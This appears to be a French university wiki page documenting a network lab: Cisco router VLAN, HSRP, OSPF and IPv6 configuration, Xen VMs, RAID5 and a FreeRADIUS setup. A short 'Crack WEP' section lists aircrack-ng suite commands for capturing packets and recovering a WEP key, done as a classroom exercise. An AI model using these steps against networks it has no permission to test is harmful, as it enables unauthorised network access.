 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 Uniquement) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248                      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  ipv6 router rip tpima5sc&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 et IPv6) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  no int vlan 131&lt;br /&gt;
  int vlan 131&lt;br /&gt;
   ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification avec Google.com =====&lt;br /&gt;
&lt;br /&gt;
On récupère une IPv6 de google avec la commande &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; depuis une zabeth puis on tente depuis le routeur de ping cette adresse&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping v6 google.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
